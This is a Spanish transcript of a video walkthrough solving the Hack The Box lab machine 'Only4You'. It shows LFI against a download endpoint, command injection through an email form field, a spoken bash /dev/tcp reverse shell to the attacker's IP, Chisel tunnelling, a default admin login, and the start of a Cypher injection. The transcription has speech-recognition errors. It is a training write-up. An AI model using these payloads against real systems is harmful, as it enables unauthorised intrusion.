¿Qué tal, compañeros de YouTube? Hoy les traigo esta máquina Only for You, la cual retira Hack the Box esta semana y la podrán hacer de forma gratuita. Es por eso que les traigo la resolución de esta máquina para que aprendan y entiendan el paso a paso de cómo resolver esta maquinita, que sí topa temas muy interesantes como lo es la Cypher Injection. Como ya saben, existen las inyecciones SQL, las inyecciones no SQL, pero aparte de esas dos, si es que no lo sabían, existen las inyecciones de Cypher, que Cypher es un lenguaje parecido al SQL que tiene la misma finalidad, que es gestionar las bases de datos, pero en grafos. Neo4j es el sistema de base de datos más conocido en este caso de los tipos de bases de datos en grafos. Existen las bases de datos estructurales, las no estructurales y las basadas en grafos. Entonces, esta máquina topa eso, bases de datos en grafos, y vamos a hacer una inyección utilizando el lenguaje de Cypher, que es el lenguaje que se utiliza para gestionar estas bases de datos eh, en grafos. Entonces, por eso lo veo muy interesante, casi no se ha visto esto en máquinas. Y bueno, también tiene un poco de análisis de código Python, un poco de escala de privilegios aprovechándonos de Python mismo, aprovechando también un repositorio, algo del gestor de paquetes de Python que es pip. Entonces me parece muy interesante lo que se toca en esta máquina y bueno, espero que aprendan mucho y también se pongan a resolverla para que practiquen, que es la mejor forma de aprender. Bueno, para empezar, como siempre, vamos a hacerle un ping a la máquina, que yo ya tengo por aquí la dirección IP 10.2.10, la tengo por acá. Vamos a hacerle un ping para ver si tenemos conexión con la máquina. Y como vemos, si tenemos conexión, nos responde el ping con un TTL de 63. Esto nos quiere decir que la máquina es una máquina Linux. Ya saben, si el TTL está cerca de 64 es Linux y si el TTL está cerca de 128 es Windows. No es algo obligatorio, pero es lo más general, es el estándar. Entonces vamos a hacer la fase de reconocimiento en el cual vamos a hacer el escaneo de puertos para ver si es que hay alguno abierto en el que podamos entrar. Entonces, como siempre, vamos a utilizar la herramienta de Nmap. Vamos a hacer un escaneo a todos los puertos utilizando el Self Scan. Vamos a escanear solamente los puertos abiertos. Le vamos a decir que nos haga un escaneo rápido de al menos 5000 paquetes por segundo. Le hacemos triple verbose para que nos vaya diciendo las cosas que vaya encontrando en el terminal. Con el parámetro "-p" le decimos que no haga resolución RP y ponemos la dirección IP de la máquina. Deja copiarla. Ok, aquí alguien pidió resetearla, pero bueno. 10, 10, 11, 210. Y vamos a decir que todo este escaneo nos lo guarde en un archivo que se llame allports. OG allports. Entonces aquí ya se procede a hacer el escaneo y como ven ya nos va encontrando los puertos abiertos que como le dije me reporta todo lo que va encontrando aquí en la terminal, así sea no termine el escaneo. Entonces me va diciendo que el puerto 80 está abierto y el puerto 22 también está abierto. Ya puedo pensar yo que en el puerto 22 hay un servicio SSH y en el puerto 80 hay un servicio web, un HTTP. Y bueno, vamos a hacer un escaneo mucho más profundo para confirmar que esto es verdad. Entonces vamos a hacerle un escaneo solamente de esos puertos, al 22 y el 80. Le decimos que nos aplique scripts básicos de reconocimiento, también para intentar saber la versión de la aplicación que está corriendo por ahí. Y le decimos la dirección IP de la máquina víctima, que en este caso es 11.2.10. Y este escaneo le vamos a decir que nos lo guarde en un archivo llamado target. Entonces aquí ya se está haciendo un escaneo mucho más profundo, es un escaneo que demora un poco más por lo mismo, porque está intentando recuperar la versión de la aplicación que están corriendo por detrás. Como ven, aquí ya terminó de hacerse el escaneo y nos muestra un poco de información para verla más bonita. Lo ponemos así con cat, que este cat en realidad es un bad cat, no es un cat normal. Y bueno, ¿qué podemos ver? Que en el puerto 22 que está abierto, existe una aplicación de OpenSSH, algo que ya suponíamos. Y en el puerto 80 vemos que hay un servidor Nginx de la versión 1.18. Ok, ya confirmamos que hay un servicio web por detrás en esta máquina. En el puerto 22 por ahora no podemos hacer nada. ¿Por qué? Porque no tenemos credenciales. Para entablar conexión con un puerto de SSH nosotros necesitamos un usuario y una contraseña válida. Pero por ahora no tenemos nada. Así que todo parece ser o parece indicar que la intrusión va a ser por vía web. Vamos a tener que buscar en el puerto 80 vulnerabilidades para ver por dónde podremos entrar. Aquí en este escaneo de las scripts básicas de reconocimiento, como ven, nos descubrió un dominio onlyforyou.htb.
Eso nos sugiere que si nosotros vamos a intentar por aquí 11.2.10 y si queremos entrar a la dirección, ven que nos redirige a este dominio. Esto es lo que se denomina como virtual hosting. Está usando dominios para apuntar a la dirección IP. Y como nuestra máquina no sabe qué es esta vaina, no se resuelve este nombre, por lo que no nos puede mostrar nada. Entonces, ¿cómo podemos hacer para que la máquina conozca y pueda resolver ese nombre onlyforyou.html? Simplemente editamos este archivo etchost y aquí debemos poner la dirección IP de la máquina víctima, que es donde queremos que apunte ese dominio 210, y aquí debemos poner el dominio, que en este caso es onlyforyou.html. Entonces aquí le estamos diciendo a la máquina que en este dominio apunte a la dirección IP de la máquina víctima. Y entonces, si hacemos Enter, bueno, por aquí nos está diciendo 502 bad gateway, porque parece ser que sí reiniciaron esta vaina. Y bueno, vamos a esperar un poco. Ok, mil disculpas. Aquí parece que la máquina había petado, entonces por eso estaban pidiendo el reset. Y bueno, ya se reseteó la máquina y ya todo está normalmente. Bueno, sigamos. Aquí nosotros habíamos abierto la página web haciendo este virtual hosting, habiendo añadido este dominio a nuestro archivo etchost. Entonces, ahora lo que resta por hacer es investigar y buscar cosas en esta web que pueda ayudarnos a entrar a la máquina, que podamos hacer algo. Nosotros debemos buscar vulnerabilidades en esta página. Entonces, lo primero que yo suelo hacer es ver el código fuente para ver si encontramos por ahí algún comentario o algún recurso importante que nos puede interesar, pero por aquí no encontramos nada. Vamos a ver qué hay en esta página web. Si vemos en Home, no nos redirige a nada, simplemente nos va por aquí, si About, no solamente nos manda a partes de la misma página, así que no tiene nada, no hay nada que podamos hacer por aquí. Bueno, en este caso, lo que podemos hacer es una búsqueda de directorios o recursos que pueda haber aquí. Pero primero, siempre que nosotros encontremos un dominio, hay la posibilidad de que existan subdominios. Entonces vamos a hacer una búsqueda de subdominios. ¿Cómo lo hacemos? Utilizando la herramienta de GoBuster. Vamos a decirle un GoBuster vhost para decirle que nos haga una búsqueda de subdominios. -u le pasamos la dirección completa, que es esta de aquí, es la URL, y le pasamos el diccionario, que como siempre yo utilizo el user share checklist. Ya les he dicho cómo se instala este. Simplemente nos vamos a Discovery, DNS, y este es el diccionario que suelo ocupar para hacer el escaneo de subdominio. Le decimos que use 20 hilos para que no vaya tan lento. Y bueno, vamos a ver qué nos encuentra. Bueno, como ven, ya nos encontró un subdominio que se llama beta.onlyforyou.html. Entonces, si nosotros hacemos lo mismo, si nos vamos ahorita a beta.onlyforyou.html, ¿qué va a pasar? La máquina no va a conocer a qué dirección apuntar utilizando este subdominio. Lo que debemos hacer es exactamente lo mismo que hicimos hace rato. Vamos a agregar este subdominio para que apunte a la dirección de la máquina víctima. Le decimos beta.onlyforyou.html. Guardamos el archivo y ahora sí, si recargamos, nos debería mostrar los recursos que hay en esta web. Y bueno, ¿qué podemos ver aquí? Only4U, resize, convert, beta. This is our beta site. Check the products and let us know what you think. If you are interested, contact us. Vemos que dice source code, código fuente. Parece ser que nos permite descargar el código fuente de esta web que es beta. Bueno, entonces vamos a descargar esto para ver qué contiene. Vamos a descargarlo en Only4U, una carpeta contenido. Vamos a guardarlo por aquí. Ok, no me deja guardarlo porque es de root. Vamos a guardarlo en la carpeta de descarga y luego lo movemos, save. Listo. Vamos a la carpeta de contenido. Movamos home Dante. ¿Cómo se llama? Descargas. Se llama source.zip. Lo movemos aquí. Vamos a hacerle un zip. Ya se descomprimió. Vemos el directorio beta. Vamos a ver qué hay por aquí. Y como vemos, parecen ser los recursos que hacen que esta página web nos muestre todo esto. Parecen ser los recursos de la página web. Vamos a leer el add.py, que parece ser el recurso principal. Y podemos ver que existen estos
diversos métodos que parece ser que funcionan en la página principal: resize, convert, source, list, download. Y si nos dirigimos a la página principal, vemos que efectivamente existen estos recursos de convert, resize y source es el que sirve para descargar el código fuente. Sin embargo, vemos que hay uno que se llama download. ¿De dónde puede estar saliendo? Vemos aquí uno que se llama list. Vamos a ver qué hay en list. Vamos a list y bueno, nos está mostrando cositas. Un listado de... No tengo ni idea de qué puede ser esto. Al parecer es para descargar imágenes y esto puede ser el tamaño de la imagen. Y bueno, vamos a darle aquí para ver qué pasa y no pasa nada. Vamos a ver qué sucede. Vamos a analizar esto mucho mejor utilizando esta herramienta que ya les he explicado que es la mejor herramienta para hacer un análisis de páginas web, que es Bursuit. Este es el que actúa como un proxy y se pone en medio de la comunicación entre el servidor y el cliente para poder interceptar las peticiones y que nosotros podamos analizarlas e incluso poder modificarlas a nuestra conveniencia. Entonces vamos aquí a activar esto y aquí vamos a activar el Bursuit, que ya les he enseñado cómo se utiliza este add-on Foxy Proxy para utilizar el Bursuit de manera mucho más cómoda. Y bueno, ya tenemos activo, vamos a darle clic aquí y vamos a ver en el Bursuit que efectivamente se interceptó la petición antes de mandarlo al servidor. Y es esto de aquí, es un post al recurso download. Efectivamente, como vemos, es este que habíamos visto acá, download, y es por post. Vamos a ver, parece que le pasa un parámetro llamado imagen y el nombre de eso es un archivo .png. Vemos que se están tramitando o que están mandando un archivo. ¿Qué podemos pensar aquí? Si vemos que la página web está haciendo ejecuciones o está manipulando archivos, está llamando archivos, lo que nosotros podemos pensar es en una inclusión de archivos locales del sistema, un LFI. Porque nosotros vemos que aquí está intentando llamar este archivo 100%.png, el cual debe ser un archivo existente dentro de la máquina víctima. Entonces, si nosotros hacemos un directory traversal o intentamos mostrar o descargar un archivo local del sistema, si es que no está sanitizado, nos lo debería permitir. Vamos a mandar esto al repeater para poder interactuar de mucho mejor forma. Y, por ejemplo, si yo quisiera ... etc passwd, con esto le estamos diciendo que en lugar de llamar ese archivo .png, nos llame al archivo passwd. Y con esto le estamos haciendo un directory traversal, que es para regresar en una máquina Linux entre directorios y que encuentre el directorio raíz para encontrar este de aquí, etc passwd. Si nosotros mandamos, vemos que no pasa nada. Sin embargo, si nosotros aquí analizamos este código en Python, nosotros podemos ver que nos está filtrando esto, slash. O sea que no podemos hacer un directory traversal. Si nosotros aquí seguimos la redirección, nos va a decir eso que nosotros habíamos visto, donde está imagen doesn't exist. Pero bueno, al parecer nos debería mostrar esto que dice aquí, hacking detected, si es que detecta el // porque ahí detecta que estamos intentando hacer un pack traversal, un directory traversal. Y bueno, si es que no funciona el directory traversal, nosotros directamente, sin hacer el // podemos decirle que nos llame a este archivo etc passwd. Vamos a intentarlo, damos en send y ok, parece que esto no está totalmente sanitizado y podemos llamar a archivos locales del sistema. Este es el archivo local del sistema, el cual contiene los usuarios. Aquí ya podemos enumerar usuarios del sistema. Aquí podemos ver un usuario John. Y bueno, por aquí podemos ver otro usuario, el usuario de root, que es el normal. Pero bueno, parece que tenemos el usuario John por aquí. Y bueno, tenemos un LFI. Podemos enumerar archivos locales del sistema. Nosotros aquí podríamos hacer un fuzzing utilizando la herramienta de ffuf, como ya les he mostrado también en máquinas anteriores, para enlistar o enumerar todos los archivos importantes que hay en la máquina de los cuales nosotros podamos aprovecharnos. Sin embargo, aquí para no perder mucho tiempo, les digo que no podemos hacer un log poisoning. Si nosotros vemos, como sabíamos que se trataba de un servidor Nginx, se nos ocurriría ver los logs de Nginx. Sin embargo, no es vulnerable a log poisoning, ni Nginx, ni SSH, ya lo intenté. Nosotros podríamos buscar
información del servidor Nginx para que nos diga el directorio en donde se encuentran los dominios que está sirviendo, porque nosotros ahorita estamos entablando conexión con este subdominio, con beta.onlyforyou.htb. Sin embargo, ¿qué pasaría si yo enlisto información del servidor Nginx para que me muestre la dirección en donde están los recursos de este dominio, onlyforyou.htb, que era la página principal? Si nosotros encontramos la dirección, o sea, conocemos la dirección de los recursos de este dominio, podríamos hacer un fuzzing de archivos importantes, porque como nosotros ya sabemos que se trata de una aplicación en Python, porque todos los recursos que vimos aquí son archivos en Python, parece que toda la web está programada en Python, podríamos hacer un fuzzing de archivos Python para leer el código fuente y buscar vulnerabilidades en esta página principal. Entonces nosotros, ¿cómo podríamos buscar archivos de Nginx que nos diga información sobre los dominios a los que está sirviendo? Si, por ejemplo, ustedes pueden hacer una búsqueda en ChatGPT. Como siempre les he dicho en máquinas anteriores, es sumamente útil esta herramienta y deben usarla con cuidado. Ustedes pueden abrir ChatGPT y preguntarle, oye, vamos a hacerlo aquí. Vamos a abrir un ChatGPT. Ok, aquí está activo el Bursweep. Vamos a recargar esto y vamos a utilizar esta herramienta de inteligencia artificial porque no debemos saberlo todo, alguien nunca lo va a saber todo, así que nosotros necesitamos apoyo y en este caso, si es que no conocemos los directorios por defecto en donde Nginx guarda su información, podríamos preguntarle al ChatGPT sin problema. Entonces nosotros aquí podríamos decir, oye, ¿en qué ruta por defecto Nginx suele almacenar información de los dominios y subdominios que está sirviendo? Entonces vamos a ver qué nos responde ChatGPT. Y bueno, nos dice cosas. Nos dice Nginx, etc Nginx, conf.d, cnginx.conf. Vamos a ver, el por defecto, que es de Apache también, Nginx, como nos dice por aquí, etc Nginx. Si nosotros aquí intentamos leer ese archivo, etc Nginx y nginx.conf, vamos a ver, ok, aquí me equivoqué, etc Nginx, vemos que sí existe este archivo y bueno, este nos muestra información muy general de lo que es Nginx. Sin embargo, como ChatGPT nos dijo por aquí, sites available y sites enable, parece ser que estos directorios son los que contienen información sobre los dominios y subdominios. Entonces vamos a ver, Nginx sites available, pero el archivo, ¿cómo se llama? Aquí el archivo puede llamarse de distintas formas, sin embargo, el nombre por default que pone Nginx es el mismo default. Entonces vamos a ver si es que existe este archivo. Bueno, era available, sí, no, sin la de sites available. Ok, aquí no nos muestra nada en sites available, en Nginx, etc, Nginx. ¿Cuál era la otra ruta? Era sites enable. Vamos a ver ahí, sites enable. Enable. Vamos a darle en send. Y bueno, este archivo sí que existe. Como vemos, nos muestra información tanto del dominio principal y del subdominio. Entonces nosotros aquí ya podemos saber la dirección en la máquina víctima en donde se está almacenando los recursos tanto del dominio como del subdominio. Como vemos, en el dominio principal los recursos se están ubicando en, aquí dice location, var www.onlyforyou.htb y bueno, parece ser que esta es la dirección en donde están alojados los recursos que hacen funcionar a la página principal, que es esta de aquí. Nosotros ya habíamos visto y vulnerado esta página, que es la del subdominio, pero a nosotros nos interesa buscar vulnerabilidades ahora en la página principal. Vamos a ver si es que encontramos algo interesante. Entonces, copiamos esto aquí, vamos a intentar leer. Bueno, como nosotros no sabemos el nombre de ningún archivo, como les dije, la página está utilizando y parece estar programada en Python. Entonces, ¿qué podríamos hacer? Vamos a hacer un fuzzing de archivos en búsqueda de recursos Python. ¿Cómo hacemos esto? Utilizando la herramienta ffuf,
que ya les había mostrado antes. Simplemente aquí se copian la petición cruda, la petición en RAW, se la guardan por aquí. Bueno, vámonos atrás, contenido, nano, pongamos nano request.txt. Esta es la forma más fácil para hacer un fuzzing de archivos o de directorios utilizando ffuf y cuando se tratan de peticiones post, porque este es un post. Entonces aquí pegamos toda la petición en RAW, aquí quitamos los espacios que sobran, eliminamos. Debemos hacer que esté exactamente igual a la petición en Bursuit. Entonces aquí vamos a decirle que nos haga el fuzzing, que nos intente encontrar archivos que terminen en .py de este directorio. Aquí le ponemos la palabra fuzz, que es la palabra clave que usa la herramienta ffuf para saber dónde reemplazar las iteraciones. Entonces vamos a hacer este fuzzing. Guardamos esta petición y para utilizar ffuf y hacer ese fuzzing de archivos, vamos a decirle ffuf -c para decirle que nos muestre con colores. Le decimos -request para decirle que nos haga el fuzzing utilizando la petición cruda, la petición en RAW que nosotros le dijimos. Le decimos que nos use el diccionario, por ejemplo, el que yo siempre suelo utilizar, como siempre es el de user setlist, bueno, user share setlist discovery. Ponemos web content common.txt. Es el primero que suelo utilizar. Si no encuentra nada, utilizo unos más grandes. Y bueno, aquí le decimos que utilice la URL HTTP y debemos decirle que es download beta.only.htb. Le decimos la URL a donde debe apuntar. Le decimos esto y le decimos que es el recurso download. Entonces aquí aplastamos Enter y se nos va a hacer el fuzzing. Sin embargo, aquí está reemplazando en todas las posibilidades, pero nosotros no queremos ver las que no nos interesan. Por ejemplo, si reemplaza home, vemos que la respuesta tiene 18 palabras. Vemos que casi todas las respuestas tienen 18 palabras. Entonces parece ser que esos intentos parece ser que no muestran nada, solo muestran el error o cosas que no nos interesan. Nosotros queremos ver si es que existen archivos que tengan contenido y bueno, en este caso vamos a buscar archivos de Python, archivos terminados en .py. Si tienen código van a tener más de 18 palabras. Entonces vamos a filtrar con fw, le decimos que no nos muestre las peticiones, las respuestas del servidor que tengan 18 palabras. Entonces damos en Enter y bueno, aquí ya nos muestra las respuestas del servidor que tienen 18 palabras. Y bueno, aquí vemos que nos encontró app y form. Vemos que este tiene 223 palabras y este tiene 127 palabras. Parece ser que estos recursos sí que existen en la página del dominio principal. Vamos a hacer con Bursuit utilizando este LFI para poder analizar lo que hay en este recurso app.py. Vamos a hacerle send y como vemos nos muestra código. Este es el código al parecer que mueve al directorio, al dominio principal de app.py. Sin embargo, por aquí no podemos ver nada. Si nosotros analizamos esto, vemos que no hay nada que podamos utilizar. Vamos a analizar este otro archivo que encontró que es form.py. Vamos a ver qué contiene ese archivo de form.py. Le damos en send y ok, este tiene muchas más cosas. Vamos a analizarlo. Vamos a copiarnos todo este código Python y para verlo mucho más bonito, vamos aquí a crearnos un archivo que se llama form.py, el mismo nombre. Vamos a guardarlo y le hacemos un cat, form.py. Ok, este es el código del archivo form.py que al parecer está corriendo en el dominio principal. Y por el nombre nosotros podemos suponer que form, podemos suponer que es un formulario. Si nosotros bajamos por aquí, podemos encontrar en la parte de contacto este formulario de aquí que nos pide nombre, email, subject y message y un botón que dice send message. Vamos a ver por aquí qué hay. Parece que define una función llamada isecure. Parece que está securizando todo lo que el usuario mete por aquí. Y vemos que hay una función, define una función que se llama sendMessage, que al parecer es este botoncito de aquí, sendMessage, para enviar el mensaje. Si nosotros nos ponemos a analizar profundamente este código aquí, vemos que por aquí, bueno, algo también importante a notar en primer lugar es que está importando la librería de subprocess.
Esto es sumamente importante de saber. ¿Por qué? Porque esta librería nos permite ejecutar comandos del sistema, con subprocess, con os. Son librerías que nos permiten ejecutar acciones dentro del sistema. Entonces vamos a ver en dónde utiliza alguna función de esta librería de subprocess. Si vemos por aquí en esta función de isecure, vemos que dominio es igual a email.split, parece que borra omite ¿cómo es el arroba? En la parte de aquí supongo que hay que poner un email con arroba. Aquí lo omite. Resultado dice run. Y bueno, ¿qué tenemos aquí? Run es una función de esta librería de subprocess que lo que hace es ejecutar un comando del sistema. Vemos que el comando que está ejecutando aquí es dict.txt utilizando domain. Esto es sumamente interesante. ¿Por qué? Porque domain, si nosotros vimos, está haciendo email, está utilizando esta variable email.split. Y si buscamos dónde está email, vemos que en esta función acepta email e IP. Vemos que en la función de isecure recibe como parámetro email y parece ser que es lo que nosotros escribimos aquí como input, porque aquí nos pide un email. Entonces parece ser que esa función trae ese email aquí y lo utiliza en esta variable que se llama domain, y domain se está utilizando en esta función que sirve para ejecutar comandos. Entonces ya nosotros podríamos pensar en una inyección de comando. ¿Por qué? Porque nosotros tenemos la capacidad de escribir lo que nosotros queramos aquí en el campo de email, y vemos que email pasa como parámetro de la función, y aquí se lo utiliza en domain y domain se lo llama aquí. Entonces, este comando dict.txt va a ejecutar en el dominio que nosotros hayamos escrito, pero si nosotros inyectamos un punto y coma o un pipe o algo para que se ejecute otro comando, puede, si es que no está completamente sanitizado, puede que efectivamente se ejecute el comando que nosotros queramos. Vamos a intentar esto. Vamos a ver. Si nosotros ponemos cualquier cosa por aquí, Dante, en email ponemos dante@hotmail.com, en subject ponemos Dante, y vamos a capturar esto con Burp para analizarlo mucho mejor. Vamos aquí a activar el Burp y vamos aquí también a activar el Burp. Le damos en Send Message y aquí tenemos la petición por post que se hace. Vamos a mandar esto al repeater para manipularlo mucho mejor. Vamos a renombrar esto, vamos a ponerle Command Injection. Al primero vamos a ponerle el FI, que es donde nosotros habíamos encontrado el FI. Ya. Vamos a ver. Nosotros aquí estamos mandando como input el email que yo había puesto, que es dante@hotmail.com. Acá lo pueden ver URL decodeado. Vamos aquí a escribir el pipe para ejecutar un comando adicional. Por ejemplo, aquí les hago una demostración rápida. Si yo ejecuto whoami, me muestra lo del comando whoami, que es el usuario que está ejecutando ese comando. Pero si yo agrego un pipe y pongo id, ¿qué es lo que pasa? Se ejecuta este comando de id. Vemos que nos muestra el id y bueno, esto es la ejecución del id y no se ejecuta lo que es el whoami. Como ven, el pipe hace eso. También nosotros podemos ejecutar comandos con punto y coma. Si pongo punto y coma id, vemos que primero se ejecuta whoami y luego se ejecuta id. Entonces aquí nosotros podríamos jugar con eso para intentar inyectar comandos. Podremos jugar con el pipe o con el punto y coma. Vamos a hacerlo con el punto y coma para probar. Vamos a decirle que nos haga un ping a nuestra máquina para confirmar que se está ejecutando comandos. Vamos a hacernos un ping. Ping -C1, la dirección de nuestro túnel, 10.10.14.171. Le damos en Apply Changes para que se URL encode. Y aquí en nuestra máquina nosotros vamos a abrirnos, vamos a ponernos en escucha para recibir pings, para recibir comunicación ICMP. Entonces, ¿cómo lo hacemos eso? Utilizando ¿cómo es? TCP-DAM. TCP-DAM, le decimos que nos pongamos en escucha en la interfaz TUN0, que es la interfaz de Hack-the-Box, y le decimos que queremos ponernos en escucha de comunicaciones ICMP. Entonces ya, aquí estamos en escucha.
cualquiera que nos haga un ping, aquí lo vamos a poder ver. Entonces vamos a hacernos el ping para ver si es que esto en verdad ejecuta comandos y hay un command injection. Y bueno, como pueden ver, efectivamente Only4U-HTTP me ha hecho un ping. Entonces sí que es vulnerable a command injection. Nosotros podremos aquí ejecutar cualquier comando. Entonces ya simplemente restaría por hacer es entablarnos una reverse shell. ¿Cómo lo hacemos? Como siempre, hacemos un bash "-c", bash "-i", mayor que, ampersand, def, tcp 10.10, aquí ponemos nuestra dirección IP del túnel, ponemos el puerto al que queremos mandar la reverse shell, 0, mayor que, ampersand 1, cerramos las comillas, le damos en API change, y ahora aquí debemos ponernos en escucha en el puerto que dijimos, nc menos el nvp 443, y ahora aquí le damos en send y nos debería mandar lo que es la reverse shell. Pero por lo que veo, por aquí me equivoqué en algo porque no se la está mandando. Vamos a ver en qué me equivoqué. Bash-c, bash-i, def tcp 10.10 14 171 443. Bueno, aquí ni siquiera me aparece nada. Ok, simplemente estaba demorando. No sé por qué, es falla capaz de la máquina. Pero bueno, aquí ya recibimos lo que es la reverse shell. Ha funcionado la ejecución de comandos, el command injection. Y bueno, no tenemos una shell como el usuario www.data. Vamos a hacer un tratamiento de la TTI para poder manipular la shell de una mejor forma. ¿Cómo hacemos esto? Bueno, script de null -c bash. Aquí aplastamos control Z, aquí aplastamos SCTI, raw, echo, fg, y aquí reset xterm para resetear la terminal. Y bueno, aquí simplemente un export term igual a xterm para poder hacer un control L. Y export shell para decirle que la shell, la variable de entorno shell, es igual a bash. También para arreglar lo que es el tamaño de la pantalla, vemos en nuestra terminal de nuestra máquina el tamaño 49 rows y 183 columns. Entonces aquí ponemos STI rows 49 y columns, ¿cuánto era? 183. Listo, ya tenemos una shell totalmente interactiva y aquí ya podríamos hacer una búsqueda para poder escalar privilegios. Nosotros si nos vamos al directorio de home, vemos qué usuarios hay. Hay el usuario Deb y el usuario John, que nosotros ya habíamos visto que existe este usuario. Entonces vamos a buscar elevar privilegios o convertirnos en uno de estos usuarios para ver si es que tienen mayores privilegios. ¿Cómo hacemos esto? Primero vemos si es que hay permisos de sudo con sudo -l, nos pide contraseñas, no tenemos nada, así que no podemos hacer nada. Otro que restaría por hacer es buscar, find desde la raíz, cosas que tengan permisos SUID para poder escalar privilegios, para poder ver si es que podemos escalar privilegios, mandamos los errores al dev null y bueno, no vemos binarios interesantes, vemos mount, sudo, mount, nada de esto podemos aprovecharlo para escalar privilegios. Si nosotros ponemos un ID para ver si estamos en un grupo interesante, vemos que no estamos en ningún grupo interesante. Bueno, si nosotros hacemos un nat para poder visualizar si es que hay puertos internos de la máquina que no se estén mostrando a las personas que hay fuera, vemos que existe este puerto 3000, este puerto 8001 y por aquí vemos el puerto 7474. Este es sumamente interesante. ¿Por qué? Si ustedes hacen una búsqueda por internet y ponen port 7474, ok, aquí desactivamos el pursuit, puerto 7474, si buscan ustedes podrán darse cuenta que en ese puerto comúnmente corre lo que es Neo 4J, los que les dije al principio. Neo 4J, vamos a buscar qué es Neo 4J. Si buscamos, nos dice Neo 4J es un software libre de base de datos orientada a grafos, implementado en Java. Los desarrolladores escriben bla, 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 bla. Esto sirve para gestionar bases de datos basadas en grafos, como les había explicado. Entonces parece ser que esta página está utilizando una base de datos orientada a grafos, porque está este puerto 7474 abierto. Me llama a mí la atención estos puertos 3000 y el 8001. Si nosotros le hacemos un curl al puerto 3000 de esta máquina, ponemos curl http, //
esta propia máquina en el puerto 3000. Si hacemos el curl, ok, aquí me faltó las comillas, vemos que nos devuelve contenido HTML. Entonces podemos nosotros pensar, bueno, confirmar que una página web se está sirviendo en este puerto, el puerto 3000. Otro puerto que nosotros habíamos visto abierto es el 8001. Vamos a ver si es que también se trata de un puerto web. Vemos que nos redirecciona a un login. Entonces parece ser que sí que son puertos que están sirviendo recursos web. Vamos a nosotros a analizar estos puertos en nuestra máquina porque por aquí no tenemos una interfaz gráfica para poder abrir el navegador y poder ver los recursos, por ejemplo este login para poder interactuar con la página web. ¿Cómo nosotros podemos hacer eso? Pues haciéndolos un túnel utilizando Chisel. Vamos a hacer un port forwarding, vamos a traernos el puerto 3000 y el puerto 8001 a nuestra máquina atacante para que desde nuestra máquina atacante podamos investigar qué hay en esos puertos en nuestro navegador. ¿Cómo hacemos eso? Vamos a nuestra dirección en donde tengamos nuestro Chisel descargado. Aquí yo ya lo tengo, Chisel. Vamos a pasarnos este Chisel a la máquina víctima. Vamos al directorio tmp en la máquina víctima. Aquí nos montamos un servidor simple de Python para poder descargarlo en la máquina víctima. Aquí con wget 10.10.14.171 Chisel lo descargamos y le damos permisos de ejecución. chmod +x Chisel. Listo, ya tenemos Chisel tanto en la máquina víctima como en la máquina atacante. Ahora, ¿qué resta por hacer? Es montar el túnel. ¿Cómo lo hacemos? En la máquina atacante nosotros debemos abrir Chisel en modo de servidor y le decimos que en forma reversa en el puerto 1234 se ponga en escucha. Aquí ya está escuchando en el puerto 1234 y ahora nosotros en la máquina víctima debemos abrir Chisel pero como cliente. Y apuntamos a la máquina que está en escucha, que es mi máquina, la máquina atacante, en el puerto 1234, que es el que le había dicho. Ok, ¿qué puertos me quiero extraer? El 3000 y el 8001. Como lo hacemos con R, le decimos que el puerto 3000 de mi máquina se convierta en el puerto 3000 de la máquina víctima. Y lo mismo para el puerto 8001. Quiero decirle que el puerto 8001 de mi máquina se convierta en el puerto 8001 de la máquina víctima. Si damos en Enter, vemos que aquí ya está escuchando tanto el puerto 3000 y el puerto 8001. Veamos, confirmemos esto con localhost apuntando al 8001 y vemos que efectivamente nos está abriendo una página web que parece ser un servidor interno de la máquina de Only4U. Y si apuntamos al localhost al puerto 3000 para ver qué hay, vemos que también nos muestra contenido web. Esto es lo que está corriendo la máquina víctima, sino que nosotros nos transferimos los puertos de la máquina víctima a nuestra máquina, por lo que ahora podremos interactuar con este contenido web y poder analizarlo. Vamos a buscar cosas que podamos hacer por aquí. Bueno, aquí podemos ya cerrar este ChatGPT. Este beta ya no estamos utilizando. Ok, aquí hay un login. ¿Qué podemos hacer? Lo primero que debemos hacer en un login es intentar contraseñas por default, como admin, root. Y vemos que admin sí que nos coge y ya nos permite entrar. Ya estamos como administrador dentro de esta página web que se llama Only4U y vemos un dashboard. Si nos vamos a Employees, vemos un campo Search. Ok, esto es interesante. Si nosotros ponemos A y buscamos cualquier cosa, vemos que nos muestra el resultado. ¿Y a qué se parece todo esto? Todas estas columnas, filas. Parece ser que aquí se está gestionando información que se obtiene de una base de datos. Y nosotros ya habíamos visto que el puerto 7474 estaba abierto. Entonces no es ni una base de datos estructurada ni una base de datos no estructurada. Es una base de datos basada en grafos. Y bueno, aquí entonces no debemos intentar SQL injection ni no SQL injection. Lo que debemos intentar es hacer inyecciones de Cypher, que es el lenguaje que se utiliza en Neo4j. Por ejemplo, lenguaje, si nosotros investigamos qué se utiliza en Neo4j, y podremos ver que Cypher es el lenguaje SQL, entre comillas, por así decirlo. Este es el que funciona como SQL para las bases de datos basadas en grafos. Entonces vamos a hacer aquí lo que se denomina un Cypher Injection. Si nosotros vamos a la Biblia del hacker, que es Hacktricks, aquí ustedes pueden encontrar lo que sea. Vamos aquí a hacer una búsqueda
de Neo4j para buscar posibles payloads para utilizar en inyecciones de Cypher. Si nosotros no tenemos nada de conocimiento de estas inyecciones del lenguaje Cypher, nos va a resultar sumamente útil. Como es mi caso, yo no tenía ni idea de la existencia de estas bases de datos orientadas a grafos, pero bueno, aquí se aprende, todo es válido. Aquí buscamos Neo4j para ver si nos muestra información y como primer resultado vemos que hay Cypher Injection. Vamos a ver qué nos puede mostrar esta Biblia sobre la Cypher Injection. Vemos por aquí posibles payloads para inyectar. Si nosotros bajamos por aquí, hay un payload que sirve para poder obtener la versión del Neo4j que está ejecutando el servidor. Vamos a intentar hacer esta inyección. Esto sería de ponerlo aquí. Es como si fuese una SQL injection, pero en el lenguaje de Cypher. Vamos a interceptar esto con Bursuit para hacerlo aquí de forma mucho más cómoda. A mí me gusta hacer todas estas cosas que tengan que ver con web utilizando Bursuit. Aquí activamos el Bursuit, ponemos cualquier cosa, le damos en buscar y aquí está la petición. Ok, ¿qué petición es esta? Esta no era la petición, no sé qué pasó. Aquí activamos el Bursuit, le damos cualquier cosa. Y aquí está, esta es. Aquí se está haciendo una petición por post en el recurso search, que es este recurso de aquí que nos permite hacer búsquedas. Y vemos que se está pasando como parámetro este search. Y parece ser que aquí es donde se hace la query, como si fuese una base de datos SQL. Sería select, from, la base, las tablas y todo eso, pero en este caso sería una query de hacerla en el lenguaje Cypher. Vamos a mandarnos esto al repeater y aquí vamos a ponerle el nombre Cypher Injection. Cypher Injection. Listo. Vamos a jugar por aquí para poder inyectar en lenguaje Cypher y poder ver si es que 